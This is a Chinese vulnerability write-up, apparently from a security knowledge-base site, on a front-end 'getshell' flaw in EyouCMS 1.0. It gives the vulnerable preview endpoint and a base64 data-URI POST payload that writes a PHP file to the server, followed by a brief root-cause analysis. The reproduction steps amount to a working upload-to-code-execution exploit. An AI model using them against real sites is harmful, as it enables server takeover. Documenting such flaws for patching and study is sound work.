menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 042-Eyoucms chevron_right 001-Eyoucms 1.0 前台getshell.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-Eyoucms 1.0 前台getshell.md
    1.22 KB / 2021-07-17 00:01:24
        # Eyoucms 1.0 前台getshell
    
    ### 一、漏洞简介
    
    官网:http://www.eyoucms.com/download/
    
    Cms下载地址:http://www.eyoucms.com/eyoucms1.0.zip
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    老样子:先讲如何利用
    
    
    ```bash
    url: http://test.eyoucms1.0.com/index.php/api/Uploadify/preview
    
    构造: <?php phpinfo;
    ```
    
    ![](images/15890219437597.png)
    
    
    
    ```bash
    post: data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
    ```
    
    ![](images/15890219596555.png)
    
    
    Shell: `http://test.eyoucms1.0.com/preview/ae85d74a721b0b8bd247bc31207a12e2.php`
    
    ![](images/15890219888869.png)
    
    
    **原理分析**
    
    漏洞文件: eyoucms1.0\application\api\controller\Uploadify.php
    
    漏洞函数:preview()
    
    ![](images/15890220021645.png)
    
    
    ![](images/15890220059357.png)
    
    
    这里我将每行有意义的代码都解释了一下帮助读者进行查看。
    
    而我刚开始时也思考了一下,这会不会是作者故意搞的后门?
    
    带着这个问题我去问了一下加的php群的一些程序员 他们很惊讶的 表示data:image/ 居然还可以不是图片?
    
    好吧。到这里我就基本明白为什么这个漏洞会出现了,估计作者以为data:image/ 只能是图片。
    
    **四、参考链接**
    
    https://www.yuque.com/pmiaowu/bfgkkh/kbh8mh
    
    links
    file_download